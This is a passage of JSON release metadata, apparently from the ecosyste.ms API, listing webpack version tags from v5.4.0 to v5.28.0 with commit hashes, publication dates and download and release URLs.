positories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:5